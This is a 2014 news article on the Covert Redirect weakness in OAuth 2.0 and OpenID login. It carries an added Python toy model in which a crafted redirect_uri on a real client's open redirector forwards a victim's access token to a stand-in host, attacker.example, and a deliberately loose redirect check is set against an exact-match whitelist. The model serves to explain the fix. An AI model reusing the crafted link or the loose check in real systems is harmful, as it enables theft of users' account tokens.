Nikhil Subramaniam, May 02, 2014 18:28:05 IST
The dust over the Heartbleed flaw has barely settled and there is more bad news for websites that rely on widely shared building blocks, this time the open standards that power third-party login rather than a piece of open-source software.
The vulnerability affects login using OAuth 2.0 and OpenID. These standards are used by Google, Facebook, Microsoft, LinkedIn and others to let third-party websites and apps authenticate users and request access to their accounts.
Discovered by Wang Jing, a Ph.D. student at Nanyang Technological University in Singapore, the vulnerability has been named Covert Redirect. It does not forge a login page; it abuses a genuine authorisation popup from the provider, reached through an affected third-party site's real domain.
For example, a victim receives a seemingly safe link which, when clicked, opens a Facebook window asking them to authorise an app using their Facebook account. Up to this point the technique resembles phishing, but what makes the flaw serious is that nothing is faked: the popup is Facebook's own, the app named in it is a real, registered one, and the address Facebook sends the response back to is on that real app's domain. That address, however, is an open redirector on the app's site, so the tokens or profile data Facebook hands back are forwarded to the attacker instead of reaching the app's server.
Information exposed this way can include email addresses, dates of birth, contact lists and, with a broad enough grant, a token that gives access to the entire account. And because the forwarding happens after Facebook has completed the authorisation, the victim's browser ends up on the attacker's chosen page, which can host further attacks.
Wang says he has already informed Facebook about the flaw; the company replied that it "understood the risks associated with OAuth 2.0" and that fixing this bug would not be accomplished in the short term. According to Wang, Facebook, Google, LinkedIn, Yahoo, Microsoft, PayPal, QQ, Weibo, Taobao, VK.com, Mail.Ru and GitHub are affected so far. He also reported the flaw to Google, LinkedIn and Microsoft.
Google said the problem was being tracked, and LinkedIn is preparing an announcement to deal with the bug. Microsoft has already investigated and concluded that the vulnerability lies on third-party domains rather than on Microsoft sites.
"Patching this vulnerability is easier said than done. If all the third-party applications strictly adhere to using a whitelist, then there would be no room for attacks," Wang writes in a blog post explaining the attack in greater detail. "However, in the real world, a large number of third-party applications do not do this due to various reasons. This makes the systems based on OAuth 2.0 or OpenID highly vulnerable."
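The attack described above and the whitelist Wang refers to can be seen side by side in a small model. The following is an added example written for this article; it is not code from Wang's write-up or from any provider. The hostnames (provider.example, photoapp.example, attacker.example), the client id and the token value are constructed, and the client's /go?url= endpoint stands in for whatever open redirector a real third-party site might expose.

```python
"""Toy model of the Covert Redirect weakness.

Three parties are simulated: an OAuth 2.0 provider (authorization server), a
legitimate third-party client site that happens to host an open redirector,
and an attacker who crafts the authorization link. All hostnames, the client
id and the token value are constructed for this example.
"""
from urllib.parse import parse_qs, quote, urlencode, urlsplit, urlunsplit

# Constructed client registration at the provider (what the consent dialog shows).
REGISTERED_CLIENTS = {
    "client-1234": {
        "name": "Example Photo App",
        "redirect_uris": ["https://photoapp.example/oauth/callback"],
    },
}


def redirect_uri_allowed_loose(client_id: str, redirect_uri: str) -> bool:
    """Weak check: accept any URL on a registered client's scheme and host.

    This is the behaviour that lets an open redirector on the client's own
    domain be used as the redirect_uri.
    """
    want = urlsplit(redirect_uri)
    return any(
        urlsplit(r).scheme == want.scheme and urlsplit(r).netloc == want.netloc
        for r in REGISTERED_CLIENTS[client_id]["redirect_uris"]
    )


def redirect_uri_allowed_strict(client_id: str, redirect_uri: str) -> bool:
    """Whitelist check: the full redirect_uri must be registered verbatim.

    RFC 6749 section 3.1.2 calls for the complete redirection URI to be
    registered and compared by simple string comparison.
    """
    return redirect_uri in REGISTERED_CLIENTS[client_id]["redirect_uris"]


def authorization_server(params: dict, redirect_uri_allowed) -> dict:
    """Provider side of the implicit grant, after the user clicks 'Authorize'.

    Returns a Location header to follow, or an error that is shown to the user
    instead of redirecting (never redirect to an unvalidated URI).
    """
    client_id, redirect_uri = params["client_id"], params["redirect_uri"]
    if client_id not in REGISTERED_CLIENTS or not redirect_uri_allowed(client_id, redirect_uri):
        return {"error": "invalid_request", "error_description": "redirect_uri mismatch"}
    token = "ACCESS_TOKEN_FOR_VICTIM"  # constructed; a real server mints one per grant
    fragment = urlencode({"access_token": token, "token_type": "bearer"})
    return {"location": f"{redirect_uri}#{fragment}"}


def client_open_redirector(url: str) -> str:
    """The legitimate client's /go?url=... endpoint, which 302s to any URL.

    Browsers keep the fragment of the current URL when following a redirect
    whose Location carries no fragment, so the access token travels along.
    """
    parts = urlsplit(url)
    if parts.path == "/go":
        target = parse_qs(parts.query).get("url", [None])[0]
        if target:
            return urlunsplit(urlsplit(target)._replace(fragment=parts.fragment))
    return url


def covert_redirect_attack(redirect_uri_allowed):
    """Run the attack end to end; return where the victim's browser lands, or None."""
    attacker_sink = "https://attacker.example/collect"
    # The redirect_uri really is on photoapp.example, so the consent dialog is
    # genuine and names the real app; only the path points at the redirector.
    malicious_redirect_uri = "https://photoapp.example/go?url=" + quote(attacker_sink, safe="")
    params = {
        "response_type": "token",
        "client_id": "client-1234",
        "redirect_uri": malicious_redirect_uri,
        "scope": "email",
    }
    # The link the victim clicks would be provider.example/oauth/authorize?<params>.
    response = authorization_server(params, redirect_uri_allowed)
    if "error" in response:
        return None
    return client_open_redirector(response["location"])


if __name__ == "__main__":
    print("loose :", covert_redirect_attack(redirect_uri_allowed_loose))
    print("strict:", covert_redirect_attack(redirect_uri_allowed_strict))
```

With the loose check the victim lands on attacker.example with the access token in the URL fragment; with exact-match registration the provider refuses the request before any redirect happens, which is the whitelist Wang describes. The fix has two halves in practice: the application must register its exact callback URLs, and the provider must compare against them by exact string match rather than by domain.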
All you can do to avoid this attack is to be careful about the links you click on, especially links that unexpectedly send you to Google or Facebook when nothing about them suggested such a redirect. Closing the tab immediately without authorising the app should prevent the redirect, since the provider only hands back a token after consent is given; an app that was authorised earlier may be approved without a prompt, however, so an unexpected provider popup is itself the warning sign.
Reporting on the vulnerability, CNET spoke to Jeremiah Grossman, founder and CEO at WhiteHat Security, who told the website, "While I can't be 100 percent certain, I could have sworn I've seen a report of a very similar if not identical vulnerability in OAuth. It would appear this issue is essentially a known WONTFIX," adding that any remedies, even though they are hard to come by, will break user experience heavily. "Just another example that Web security is fundamentally broken and the powers that be have little incentive to address the inherent flaws."
Chris Wysopal, CTO at code verification firm Veracode, further told CNET: "Given the trust users put in Facebook and other major OAuth providers I think it will be easy for attackers to trick people into giving some access to their personal information stored on those services."
Wang says users are in a catch-22 situation, since neither the third-party site nor the provider is willing to take responsibility for such an attack. Cost is a major factor as well: providers and the applications that register with them would have to build and enforce a whitelist of exact redirect addresses, and that will no doubt take a lot of time.